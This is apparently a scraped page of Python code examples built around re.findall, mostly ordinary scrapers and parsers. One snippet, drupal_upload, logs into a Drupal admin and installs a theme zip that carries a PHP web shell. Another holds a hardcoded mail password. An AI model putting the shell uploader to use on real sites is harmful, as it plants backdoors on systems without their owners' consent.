Beispiel #1
1
def getCategoryUrl(site="",url=""):
    catDb = openTable(tableName=global_setting['catTable'])
    r = session.get(url)
    if not r.text:
        return False

    soup = BeautifulSoup(r.text)
    for level1 in soup.select('.classify_books'):
        curLevel1 = level1.select('.classify_title')[0].text
        curLevel1 = re.sub('\s', '', curLevel1)
        for level2 in level1.select('.classify_kind'):
            curLevel2 = level2.select('.classify_kind_name')[0].text
            curLevel2 = re.sub('\s', '', curLevel2)
            for level3 in level2.select('ul li a'):
                #curLevel3 = re.sub('\s', '', level3.text)
                curLevel3 =  level3.text.strip()
                curlUrl = level3['href']
                retFind = re.findall(r'\/cp(.*)\.html',curlUrl)
                if retFind:
                    curCatID = retFind[0]
                    catType = 'book'
                else:
                    retFind = re.findall(r'\/cid(.*)\.html',curlUrl)
                    if retFind:
                        curCatID = retFind[0]
                        catType = 'nonbook'
                if retFind:
                    if catDb.find({'catId':curCatID}).count() >0:
                        logger.debug('catetogy %s exists,skip\n'%(curCatID))
                    else:
                        catDb.insert({'catId':curCatID,'level1':curLevel1, 'level2':curLevel2, 'level3':curLevel3, 'catUrl':curlUrl,'catType':catType, 'site':site})
    return True
	def DownloadUpdate(self, file):
		self.log('Downloading: %s' % file)
		dirfile = os.path.join(self.UpdateTempDir,file)
		dirname, filename = os.path.split(dirfile)
		if not os.path.isdir(dirname):
			try:
				os.makedirs(dirname)
			except:
				self.log('Error creating directory: '  +dirname)
		url = self.SVNPathAddress+urllib.quote(file)
		try:
			if re.findall(".xbt",url):
				self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
				urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8"))
			else: urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8") )
			self.DownloadedFiles.append(urllib.unquote(url))
			return 1
		except:
			try:
				time.sleep(2)
				if re.findall(".xbt",url):
					self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
					urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
				else: urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8") )
				urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
				self.DownloadedFiles.append(urllib.unquote(url))
				return 1
			except:
				self.log("Download failed: %s" % url)
				self.DownloadFailedFiles.append(urllib.unquote(url))
				return 0
Beispiel #3
0
def same_url(raw_url1, raw_url2):
    """Check if 2 URLs refer to the same primary resource

    `urltools.compare()` fails if the 2 URLs have different fragments.
    See issue #8 for details. The function treats a special case where
    the path is simply '/blog' to accommodate some blogs that refer to
    their posts via the fragment.

    Args:
        url1 (str): First URL to be compared
        url2 (str): Second URL

    Returns:
        bool: Whether the URLs are the same
    """
    arxiv_exception = 'arxiv.org'
    fragment_identifier = '#'

    url1 = _parse_url(raw_url1)
    url2 = _parse_url(raw_url2)

    # If it's on arxiv, do some acrobatics
    if url1['netloc'] == url2['netloc'] == arxiv_exception:
        regex = '([^/a-z]+\.[^/a-z.]+)'
        return re.findall(regex, url1['path']) == re.findall(regex, url2['path'])
    else:
        return urltools.compare(_normalize_url(raw_url1), _normalize_url(raw_url2))
Beispiel #4
0
def update_lyrics(request):  
    b = open('./artistList.txt', 'r') 
    bb = b.read()
    b.close() 
    bbb = bb.split(chr(10))

    for ar in bbb: 
        if ar.split('=')[1] == '1':
            return index(request)

        furl = "/"+ar.split('=')[1]+".htm"
        ar = ar.split('=')[0]
        artxt = ''
        
        #req = urllib2.Request(u"http://mojim.com/"+ar+".html?t1")
        #print "connected >> http://mojim.com/"+ar+".html?t1"
        #response = urllib2.urlopen(req) 
        #result = response.read()     
        print '--',furl,'--'

        if len(furl) > 0:           
            req2 = urllib2.Request("http://mojim.com"+furl) 


            response2 = urllib2.urlopen(req2)
            result2 = response2.read()     
            
            furl2 = re.findall('/tw[0-9x]*.htm', result2)
            iii = -1
            if len(furl2) > 0:        
                for furl3 in furl2: 
                    iii = iii + 1
                    if iii % 2 == 0: continue
                    try: 
                        req3 = urllib2.Request("http://mojim.com"+furl3) 
                        
                        response3 = urllib2.urlopen(req3)
                        result3 = response3.read()   
                        
                        lasturl = re.findall('<dl><dt><br /><br />[^^]*</div>', result3)
                        #a = raw_input()
                        artxt = lasturl[0].replace('更多更詳盡歌詞','').replace(u'在 ','').replace(u'Mojim.com','').replace(u'※','').replace('魔鏡歌詞網','')
  
                        aaaaaaaa = re.findall(u'title="歌詞(.*)">', artxt)
                        bbbbbbbb = re.findall('<dd><br />(.*)</dd>', artxt) 
     
                        bCnt = len(bbbbbbbb)
                        for bi in range(0, bCnt): 
                            if len(bbbbbbbb[bi]) > 22: 
                                lv = LyricsView()
                                ll = striphtml(bbbbbbbb[bi].encode('Shift_JIS').replace('<br />', '\r'))
                                ll = ll[:len(ll)-24]
                                lv.setParams({'artist':ar,'title':aaaaaaaa[bi],'lyrics':ll})
                                lv.save() 
                    except:
                        pass
        '''a = open(u''+ar+'.html', 'w')
        a.write(artxt)
        a.close()'''
    return index(request)
Beispiel #5
0
def ident_author(name, pp=prompt_possibles):
    orig_name = name
    name = ''.join(re.findall('[A-Z0-9]+',name.upper()))
    best_authors = []
    with open('sample_data/author_names.json', 'r') as f:
        j = json.load(f)
        for b in j['results']['bindings']:
            author_orig = b['name']['value']
            uri = b['author']['value']
            author = b['name']['value'].upper()
            subnames = author_orig.split()
            author = ''.join(re.findall('[A-Z0-9]+',author))
            dist = jaccard_ngram_dist(name,author,3)
            best_authors.append(((author_orig,uri),dist))
            if len(subnames)>=2:
                for sname in [subnames[0], subnames[-1]]:
                    sname = ''.join(re.findall('[A-Z0-9]+',sname))
                    dist = jaccard_ngram_dist(name,sname,3)
                    best_authors.append(((author_orig,uri),dist))
            if len(best_authors)>20:
                best_authors.sort(key=lambda x:x[1])
                best_authors = best_authors[:5]
    best_authors.sort(key=lambda x:x[1])
    best_authors = best_authors[:5]
    best_dist = best_authors[0][1]
    possibles = [best_authors[0][0]]
    for author, dist in best_authors[1:]:
        percent_diff = (dist-best_dist)*2/float(dist+best_dist)
        if percent_diff < __CUTOFF__:
            possibles.append(author)
    if len(possibles)>1:
        identified = pp(orig_name, possibles)
    else:
        identified = possibles[0]
    return identified
Beispiel #6
0
    def run_query(self, query):
        '''Run a query, returning the results as a list of dictionaries

        When unknown output is encountered, OsqueryUnknownException is thrown.
        When osqueryi returns an error, OsqueryException is thrown.
        '''
        query = query + ';'  # Extra semicolon causes no harm
        result = self.run_command(query)
        # On Mac, the query appears first in the string. Remove it if so.
        result = re.sub(re.escape(query), '', result).strip()
        result_lines = result.splitlines()

        if len(result_lines) < 1:
            raise OsqueryUnknownException(
                'Unexpected output:\n %s' % result_lines)
        if result_lines[0].startswith(self.ERROR_PREFIX):
            raise OsqueryException(result_lines[0])

        try:
            header = result_lines[1]
            columns = re.findall('[^ |]+', header)
            rows = []
            for line in result_lines[3:-1]:
                values = re.findall('[^ |]+', line)
                rows.append(
                    dict((col, val) for col, val in zip(columns, values)))
            return rows
        except:
            raise OsqueryUnknownException(
                'Unexpected output:\n %s' % result_lines)
Beispiel #7
0
def summary_up_result(result_file, ignore, row_head, column_mark):
    """
    Use to summary the monitor or other kinds of results. Now it calculates
    the average value for each item in the results. It fits to the records
    that are in matrix form.

    @result_file: files which need to calculate
    @ignore: pattern for the comment in results which need to through away
    @row_head: pattern for the items in row
    @column_mark: pattern for the first line in matrix which used to generate
    the items in column
    Return: A dictionary with the average value of results
    """
    head_flag = False
    result_dict = {}
    column_list = {}
    row_list = []
    fd = open(result_file, "r")
    for eachLine in fd:
        if len(re.findall(ignore, eachLine)) == 0:
            if len(re.findall(column_mark, eachLine)) != 0 and not head_flag:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[i] = {}
                        column_list[column] = i
                        column += 1
                head_flag = True
            elif len(re.findall(column_mark, eachLine)) == 0:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                row_flag = False
                for i in row_list:
                    if row == i:
                        row_flag = True
                if row_flag is False:
                    row_list.append(row)
                    for i in result_dict:
                        result_dict[i][row] = []
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[column_list[column]][row].append(i)
                        column += 1
    fd.close()
    # Calculate the average value
    average_list = {}
    for i in column_list:
        average_list[column_list[i]] = {}
        for j in row_list:
            average_list[column_list[i]][j] = {}
            check = result_dict[column_list[i]][j][0]
            if utils_misc.aton(check) or utils_misc.aton(check) == 0.0:
                count = 0
                for k in result_dict[column_list[i]][j]:
                    count += utils_misc.aton(k)
                average_list[column_list[i]][j] = "%.2f" % (count /
                                                            len(result_dict[column_list[i]][j]))

    return average_list
Beispiel #8
0
def weatherReport():
	htmlfile = urllib.urlopen('http://www.weather.com/weather/today/Mahomet+IL+61853:4:US')
	htmltext = htmlfile.read()

	rnTemp =  '<span itemprop="temperature-fahrenheit">(.+?)</span>'
	conditions = '<div class="wx-phrase ">(.+?)</div>'
	tonightTemp = '<div class="wx-temperature">(.+?)</div>'

	rntPattern = re.compile(rnTemp)
	conditionsPattern = re.compile(conditions)
	tonightTempPattern = re.compile(tonightTemp)


	rntInstance = re.findall(rntPattern, htmltext)
	conditionsInstance = re.findall(conditionsPattern, htmltext)
	tonightTempInstance = re.findall(tonightTempPattern, htmltext)

	
	currentConditions = conditionsInstance[0]
	tonightConditions = conditionsInstance[2]
	currentTemp  = rntInstance[0]
	tonightTemp = tonightTempInstance[2][:2]
	print currentTemp

	to = ['*****@*****.**', '*****@*****.**']
	sender = 'weather.bot1'
	subject = 'Your Daily Weather Forecast is Here'
	bodymsg = "Right now: " + currentTemp +' degrees.' + '  '  + currentConditions + '.' + "\n"  +"Tonight: "  + \
			   tonightTemp + ' degrees.' + '  ' + tonightConditions + '.\n\n' + "Read more about today's weather here: "\
			   "http://www.weather.com/weather/today/Mahomet+IL+61853:4:US" + "\n"  + "This message was mad by request via WeatherBot.\nHave a great day."

	for address in to:
		createMessage(address, '*****@*****.**', 'skytower', subject, bodymsg)

	return
def wigle_print(username, password, netid):
    browser = mechanize.Browser()

    browser.open('http://wigle.net')
    reqData = urllib.urlencode({'credential_0': username,
                                'credential_1': password})

    browser.open('https://wigle.net//gps/gps/main/login', reqData)

    params = {}
    params['netid'] = netid
    reqParams = urllib.urlencode(params)
    respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
    resp = browser.open(respURL, reqParams).read()

    mapLat = 'N/A'
    mapLon = 'N/A'
    rLat = re.findall(r'maplat=.*\&', resp)

    if rLat:
        mapLat = rLat[0].split('&')[0].split('=')[1]
        rLon = re.findall(r'maplon=.*\&', resp)

    if rLon:
        mapLon = rLon[0].split

    print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
Beispiel #10
0
def _strip_and_unquote_list( keys, value ):
    if value[0] == '"':
        # double-quoted values
        m = _DQV.match( value )
        if m:
            value = m.groups()[0]
        values = re.findall( _DQ_L_VALUE, value )
    elif value[0] == "'":
        # single-quoted values
        m = _SQV.match( value )
        if m:
            value = m.groups()[0]

        values = re.findall( _SQ_L_VALUE, value )
    else:
        # unquoted values
        # (may contain internal quoted strings with list delimiters inside 'em!)
        m = _DQV.match( value )
        if m:
            value = m.groups()[0]
        else:
            n = _SQV.match( value )
            if n:
                value = n.groups()[0]

        values = list(_unquoted_list_parse( keys, value ))
        # allow trailing commas
        if values[-1] == '':
            values = values[0:-1]

    return values
Beispiel #11
0
 def test_list(self):
     # list apps and get their names
     child = pexpect.spawn("{} apps".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps_before = re.findall(r'([-_\w]+) {\w?}', child.before)
     # create a new app
     self.assertIsNotNone(self.formation)
     child = pexpect.spawn("{} apps:create --formation={}".format(
         DEIS, self.formation))
     child.expect('done, created ([-_\w]+)')
     app = child.match.group(1)
     child.expect(pexpect.EOF)
     # list apps and get their names
     child = pexpect.spawn("{} apps".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps = re.findall(r'([-_\w]+) {\w?}', child.before)
     # test that the set of names contains the previous set
     self.assertLess(set(apps_before), set(apps))
     # delete the app
     child = pexpect.spawn("{} apps:destroy --app={} --confirm={}".format(
         DEIS, app, app))
     child.expect('done in ', timeout=5 * 60)
     child.expect(pexpect.EOF)
     # list apps and get their names
     child = pexpect.spawn("{} apps:list".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps = re.findall(r'([-_\w]+) {\w?}', child.before)
     # test that the set of names is equal to the original set
     self.assertEqual(set(apps_before), set(apps))
Beispiel #12
0
def parse_cpu_time(time):
    #return number of micro second
    # time may be '12m53s', or '0.01s'
    hour_match = re.findall(r'\d+h', time)
    minute_match = re.findall(r'\d+m', time)
    sec_match = re.findall(r'[0-9]+\.*[0-9]*s', time)

    if len(hour_match) == 0:
        hour = 0
    else:
        hour = int(hour_match[0][:-1])

    if len(minute_match) == 0:
        minute = 0
    else:
        minute = int(minute_match[0][:-1])

    if len(sec_match) == 0:
        sec = 0
    else:
        sec = float(sec_match[0][:-1])

    # Return time in unit of ms (microsecond)
    time_ret = int((sec + (minute * 60) + (hour * 3600)) * 1000)
    return time_ret
Beispiel #13
0
    def __search(self, titles, year, season='0'):
        try:
            query = self.search_link % (urllib.quote_plus(titles[0]))
            query = urlparse.urljoin(self.base_link, query)

            t = [cleantitle.get(i) for i in set(titles) if i]
            y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']

            r = client.request(query)

            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'list_movies'})
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'item_movie'})
            r = dom_parser.parse_dom(r, 'h2', attrs={'class': 'tit'})
            r = dom_parser.parse_dom(r, 'a', req='href')
            r = [(i.attrs['href'], i.content.lower()) for i in r if i]
            r = [(i[0], i[1], re.findall('(.+?) \(*(\d{4})', i[1])) for i in r]
            r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
            r = [(i[0], i[1], i[2], re.findall('(.+?)\s+(?:\s*-?\s*(?:season|s))\s*(\d+)', i[1])) for i in r]
            r = [(i[0], i[3][0][0] if len(i[3]) > 0 else i[1], i[2], i[3][0][1] if len(i[3]) > 0 else '0') for i in r]
            r = [(i[0], i[1], i[2], '1' if int(season) > 0 and i[3] == '0' else i[3]) for i in r]
            r = sorted(r, key=lambda i: int(i[2]), reverse=True)  # with year > no year
            r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y and int(i[3]) == int(season)][0]

            return source_utils.strip_domain(r)
        except:
            return
Beispiel #14
0
def drupal_upload(url, login, pwd):
  print '[*] Trying to install theme with shell.'
  dpl_sess = drupal_admin(url, login, pwd)
  info = 'name = '+globals.SHELL_NAME+'\ndescription = '+globals.SHELL_NAME+'\npackage = public-action\nversion = VERSION\ncore = 7.x\nfiles[] = '+globals.SHELL_EXT
  page = dpl_sess.get(url+"?q=admin/appearance/install")
  token1 = re.findall('<input type="hidden" name="form_build_id" value="(.*?)" />',page.text)
  token2 = re.findall('<input type="hidden" name="form_token" value="(.*?)" />',page.text)
  if (token1 == []) or (token2 == []):
    print '[-] Failed to get token. Login or password incorrect or not supported Drupal version.'
    sys.exit()
  post = {'form_build_id' : str(token1[0]),
          'form_token' : str(token2[0]),
          'form_id' : 'update_manager_install_form',
          'op' : 'Install'}
  print '[*] Creating %s.zip in current folder.' % (globals.SHELL_NAME)
  arch = zipfile.ZipFile(globals.SHELL_NAME+".zip", 'w')
  arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_EXT, globals.PHP_EXEC)
  arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_NAME+".info",info)
  arch.close()
  file = {'files[project_upload]' : (globals.SHELL_NAME+".zip",open(globals.SHELL_NAME+".zip",'rb'),'application/zip')}
  print '[*] Trying to upload zip file.'
  up = dpl_sess.post(url+"?q=admin/appearance/install",files=file,data=post,timeout=None)
  get_link = re.findall('URL=(.*?)" />',up.text)
  if not get_link:
    print '[-] Failed to upload zip file. Try one more time.'
    sys.exit()
  link = str(get_link[0]).replace('&amp;','&')
  dpl_sess.get(link)
  shell = url+"sites/all/themes/"+globals.SHELL_NAME+"/"+globals.SHELL_EXT
  check = dpl_sess.get(shell)
  if check.status_code == 200:
    return shell
  else:
    print '[-] Themes or tmp directories is not writable.'
    sys.exit()
def __load_testdata(file):
   """
   Reads the testdata out of a file.  Testdata consists of exactly three 
   strings on each line, each one enclosed in quotation marks (" or ').  
   The first is the filename to be parsed, the second is the series name
   that should be parsed out of it, and the third is the issue number string
   that should be parsed out of it.
   
   Blank lines and lines that begin with # are ignored.
   """
   retval = []
   if File.Exists(file): 
      with StreamReader(file, Encoding.UTF8, False) as sr:
         line = sr.ReadLine()
         while line is not None:
            line = line.strip()
            if len(line) > 0 and not line.startswith("#"):
               if line.startswith('"'):
                  data = re.findall(r'"(.*?)"', line)
               else:
                  data = re.findall(r"'(.*?)'", line)
               if len(data) == 3:
                  data.append("")
               if len(data) != 4:
                  raise Exception("badly formatted test data");
               retval.append( data ) 
            line = sr.ReadLine()
   return retval
Beispiel #16
0
def process_line_exceptions(line, extra_tags):
    global except_base_tag

    if not ' ' in line or re.match('.*[а-яіїєґ]/.*', line):
      return line
    if re.match('^[^ ]+ [^ ]+ [^:]?[a-z].*$', line):
      return line

    if line.startswith('# !'):
      except_base_tag = re.findall('![a-z:-]+', line)[0][1:] + ':'
      return ''
    
    base = re.findall('^[^ ]+', line)[0]
    
    except_base_tag2 = except_base_tag
    if base.endswith('ся'):
        except_base_tag2 = except_base_tag.replace('verb:', 'verb:rev:')
      
    out_line = re.sub('([^ ]+) ?', '\\1 ' + base + ' ' + except_base_tag2 + 'unknown' + extra_tags + '\n', line)
    
    if except_base_tag in ('verb:imperf:', 'verb:perf:'):
      base_add = 'inf:'
#      if base.endswith('ся'):
#        base_add = 'rev:' + base_add
      out_line = re.sub("(verb:(?:rev:)?)((im)?perf:)", "\\1inf:\\2", out_line, 1)
      
      out_lines = out_line.split('\n')
      out_lines[0] = out_lines[0].replace(':unknown', '')
      out_line = '\n'.join(out_lines)
    
    return out_line[:-1]
    def get_episode(self,url):
        html = self.fetch_url(url)
        divs = re.findall(r'<div id="fenji_\d+_(asc|\d+)"(.*?)<\/div>', html) 
        result = []
        if divs:
            for div in divs:
                #                              链接                                   第N集                 小标题
                r = re.findall(r'<h3><a href="(.*?)" target="_blank" title=".*?">.*?(第\d+集)<\/a></h3><h4>(.+?)</h4>', div[1])

                if r:     #电视剧
                    for ep_data in r:
                        result.append({"title":ep_data[1] + " " + ep_data[2],
                                        "img":"",
                                        "url":ep_data[0]})
                                        
                else: 
                    
                    #                             链接                          标题   小标题            期数(日期)
                    r = re.findall(r'<h3><a href="(.*?)" target="_blank" title="(.*?)">(.*?)<\/a></h3><h4>(.+?)期</h4>', div[1])
                    if r:  #综艺
                        for ep_data in r:
                            dateA = ep_data[3].split("-")
                            date = ""
                            if len(dateA) == 3:  #2012-08-12
                                date = "%s.%s.%s" % (dateA[2],dateA[1],dateA[0])
                            result.append({"title":ep_data[1] + " " + ep_data[2],
                                        "img":"",
                                        "url":ep_data[0],
                                        "date":date})
        return result           
             
#aa = IkankanResolver("http://data.movie.kankan.com/movie/38534?id=731018")
Beispiel #18
0
def LISTSHOWS(murl,channel,index=False):
    link=main.OPENURL(murl)
    link=link.replace('\r','').replace('\n','').replace('\t','').replace('&nbsp;','')
    match = re.findall('<div class="titleline"><h2 class="forumtitle"><a href="(.+?)">(.+?)</a></h2></div>',link)
    label='TV Shows'
    if not len(match) > 0:
        match = re.findall('<h3 class="threadtitle">.+?<a class=".+?" href="(.+?)" id=".+?">(.+?)</a></h3>', link)
        label = 'Movies'
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until ' + label + ' Show list is cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
    dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url,name in match:
        if "color" in name:
            name=name.replace('<b><font color=red>','[COLOR red]').replace('</font></b>','[/COLOR]')
            name=name.replace('<b><font color="red">','[COLOR red]').replace('</font></b>','[/COLOR]')
        if label == 'Movies':
            main.addDirX(name, MainUrl+url,39,'',searchMeta=True, metaType='Movies')
        else:
            main.addTVInfo(name,MainUrl+url,38,getShowImage(channel,name),'','')
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100)/totalLinks
        remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
        dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
        if dialogWait.iscanceled(): return False   
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), label)
    main.VIEWS()
Beispiel #19
0
def LISTEPISODES(tvshowname,url):
    link=main.OPENURL(url)
    link=link.replace('\r','').replace('\n','').replace('\t','').replace('&nbsp;','')
    match = re.findall('<a class=".+?" href="(.+?)" id=".+?">(.+?)</a>',link)
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until ['+tvshowname+'] Episodes are cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
    dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url,name in match:
        if "Online" not in name: continue
        name=name.replace(tvshowname,'').replace('Watch Online','')
        name=main.removeNonASCII(name)
        main.addTVInfo(name,MainUrl+url,39,'','','') 
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100)/totalLinks
        remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
        dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
        if dialogWait.iscanceled(): return False   
    match=re.findall('<div id="above_threadlist" class="above_threadlist">(.+?)</div>',link)
    for string in match:
        match1=re.findall('<a href="(.+?)" title="(.+?)">[0-9]+</a>', string)
        for url, page in match1:
            main.addTVInfo(page,MainUrl+url,38,'','','')
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), 'TV Shows')
    main.VIEWS()
Beispiel #20
0
def memory(inp):
    """memory -- Displays the bot's current memory usage."""
    if os.name == "posix":
        # get process info
        status_file = open('/proc/self/status').read()
        s = dict(re.findall(r'^(\w+):\s*(.*)\s*$', status_file, re.M))
        # get the data we need and process it
        data = s['VmRSS'], s['VmSize'], s['VmPeak'], s['VmStk'], s['VmData']
        data = [float(i.replace(' kB', '')) for i in data]
        strings = [convert_kilobytes(i) for i in data]
        # prepare the output
        out = "Threads: \x02{}\x02, Real Memory: \x02{}\x02, Allocated Memory: \x02{}\x02, Peak " \
              "Allocated Memory: \x02{}\x02, Stack Size: \x02{}\x02, Heap " \
              "Size: \x02{}\x02".format(s['Threads'], strings[0], strings[1], strings[2],
              strings[3], strings[4])
        # return output
        return out

    elif os.name == "nt":
        cmd = 'tasklist /FI "PID eq %s" /FO CSV /NH' % os.getpid()
        out = os.popen(cmd).read()
        memory = 0
        for amount in re.findall(r'([,0-9]+) K', out):
            memory += float(amount.replace(',', ''))
        memory = convert_kilobytes(memory)
        return "Memory Usage: \x02{}\x02".format(memory)

    else:
        return "Sorry, this command is not supported on your OS."
Beispiel #21
0
def compile_formula(formula, verbose=False):
    """Compile formula into a function. Also return letters found, as a str,
    in same order as parms of function. The first digit of a multi-digit 
    number can't be 0. So if YOU is a word in the formula, and the function
    is called with Y eqal to 0, the function should return False."""

    # modify the code in this function.

    letters = ''.join(set(re.findall('[A-Z]', formula)))
    print letters
    first_letters = set(re.findall('([A-Z])[A-Z]', formula))
    print first_letters
    checklist = ['%s!=0' % (w) for w in first_letters]
    checklist.append('1==1')
    print checklist
    check = ' and '.join(checklist)
    print check
    parms = ', '.join(letters)
    print parms
    tokens = map(compile_word, re.split('([A-Z]+)', formula))
    print tokens
    body = ''.join(tokens)
    print body
    f = 'lambda %s: %s and (%s)' % (parms, body, check)
    if verbose: print f
    return eval(f), letters
def parse_current_docket(docket_record):
    # grab the file with the URL mangled slightly to grab 100k records
    docket_file = urllib2.urlopen(docket_record['url'] + "&ctl00_ctl00_cphContentMain_MainContent_gvCommentListChangePage=1_100000").read()
    page = pq(etree.fromstring(docket_file, parser))

    docket = dict(docket_record)

    docket['title'] = page('.dyn_wrap h1').text().strip()
    assert docket['title'], 'no title found'

    headers = [item.text().strip() for item in page('.rgMasterTable thead th').items()]

    docket['comments'] = []

    # check if there's a no-records message
    if len(page('.rgMasterTable .rgNoRecords')):
        return docket
    
    for row in page('.rgMasterTable tbody tr').items():
        tds = row.find('td')
        cell_text = [item.text().strip() for item in tds.items()]
        cdata = dict(zip(headers, cell_text))
        
        link = pq(tds[-1]).find('a')

        doc = {
            'url': urlparse.urljoin(docket['url'], link.attr('href')),
            'details': {},
            'release': [fix_spaces(cdata['Release'])],
            'date': cdata['Date Received'],
            'doctype': 'public_submission',
        }

        vc_matches = re.findall(r"ViewComment\.aspx\?id=(\d+)", doc['url'])
        if vc_matches:
            doc['id'] = vc_matches[0]
            doc['subtype'] = 'comment'
            detail_columns = ['Organization', 'First Name', 'Last Name']
        else:
            ep_matches = re.findall(r"ViewExParte\.aspx\?id=(\d+)", doc['url'])
            if ep_matches:
                doc['id'] = "EP-%s" % ep_matches[0]
                doc['subtype'] = 'exparte'
                detail_columns = ['Organization']
            else:
                assert False, "expected either comment or exparte link: %s" % doc['url']

        for rdg_label, cftc_label in (('Organization Name', 'Organization'), ('First Name', 'First Name'), ('Last Name', 'Last Name')):
            if cftc_label in detail_columns and cdata[cftc_label]:
                doc['details'][rdg_label] = cdata[cftc_label]

        docket['comments'].append(doc)

    assert len(docket['comments']) < 100000, "we probably exceeded one page"

    # then strip out all the ones that aren't about this document
    release = fix_spaces(page('a[id*=rptReleases_hlReleaseLink]').text().strip())
    docket['comments'] = [comment for comment in docket['comments'] if comment['release'][0] == release]

    return docket
Beispiel #23
0
 def extractSrcFileData(self, path):
     fileinput.close()
     isLocListener = False
     wakeLockAcqRegex = "invoke-virtual(.*?)Landroid/os/PowerManager$WakeLock;->acquire()"
     domRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/DocumentBuilderFactory;->newDocumentBuilder()"
     saxRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/SAXParserFactory;->newSAXParser()"
     xmlppRegex = "invoke-static(.*?)Landroid/util/Xml;->newPullParser()"
     for line in fileinput.input([path]):
         matches = re.findall(wakeLockAcqRegex, line)
         if len(matches) > 0:
             self.numNoTimeoutWakeLocks = self.numNoTimeoutWakeLocks + 1
         if line.startswith(".implements Landroid/location/LocationListener;"):
             self.numLocListeners = self.numLocListeners + 1
             isLocListener = True
         if isLocListener:
             if "\"gps\"" in line:
                 self.numGpsUses = self. numGpsUses + 1
         matches = re.findall(domRegex, line)
         if len(matches) > 0:
             self.numDomParser = self.numDomParser + 1
         matches = re.findall(saxRegex, line)
         if len(matches) > 0:
             self.numSaxParser = self.numSaxParser + 1
         matches = re.findall(xmlppRegex, line)
         if len(matches) > 0:
             self.numXMLPullParser = self.numXMLPullParser + 1
Beispiel #24
0
    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)

        title = self._html_search_meta('title', webpage, 'title', fatal=True)
        TITLE_SUFFIX = ' - TeacherTube'
        if title.endswith(TITLE_SUFFIX):
            title = title[:-len(TITLE_SUFFIX)].strip()

        description = self._html_search_meta('description', webpage, 'description')
        if description:
            description = description.strip()

        quality = qualities(['mp3', 'flv', 'mp4'])

        media_urls = re.findall(r'data-contenturl="([^"]+)"', webpage)
        media_urls.extend(re.findall(r'var\s+filePath\s*=\s*"([^"]+)"', webpage))
        media_urls.extend(re.findall(r'\'file\'\s*:\s*["\']([^"\']+)["\'],', webpage))

        formats = [
            {
                'url': media_url,
                'quality': quality(determine_ext(media_url))
            } for media_url in set(media_urls)
        ]

        self._sort_formats(formats)

        return {
            'id': video_id,
            'title': title,
            'thumbnail': self._html_search_regex(r'\'image\'\s*:\s*["\']([^"\']+)["\']', webpage, 'thumbnail'),
            'formats': formats,
            'description': description,
        }
Beispiel #25
0
 def evalAtom(self, atom, param_names):
     if atom in self.consts:
         return '(const _%s)'%atom
     elif atom in param_names:
         return '(param (paramref \"%s\"))'%atom
     elif re.match(r'^\d+$', atom):
         return '(const (intc %s))'%atom
     elif atom.lower() in ['true', 'false']:
         return '(const (boolc %s))'%atom.lower()
     elif re.match(r'^forall.*end$', atom) or re.match(r'^exists.*?end$', atom):
         if re.match(r'^forall.*end$', atom):
             params, text = re.findall(r'forall(.*?)do(.*)end', atom)[0]
         else:
             params, text = re.findall(r'exists(.*?)do(.*)end', atom)[0]
         param_name_dict, param_defs = analyzeParams(params)
         for p in param_names:
             if p not in param_name_dict: param_name_dict[p] = 0
         text = self.splitText(text)
         sub_form = self.evaluate(self.process(text), param_name_dict)
         if re.match(r'^forall.*?end$', atom):
             return '(forallFormula %s %s)'%(param_defs, sub_form)
         else:
             return '(existFormula %s %s)'%(param_defs, sub_form)
     else:
         return '(var %s)'%self.evalVar(atom)
Beispiel #26
0
def __get_dom_elements(item, name, attrs):
    if not attrs:
        pattern = '(<%s(?:\s[^>]*>|/?>))' % (name)
        this_list = re.findall(pattern, item, re.M | re.S | re.I)
    else:
        last_list = None
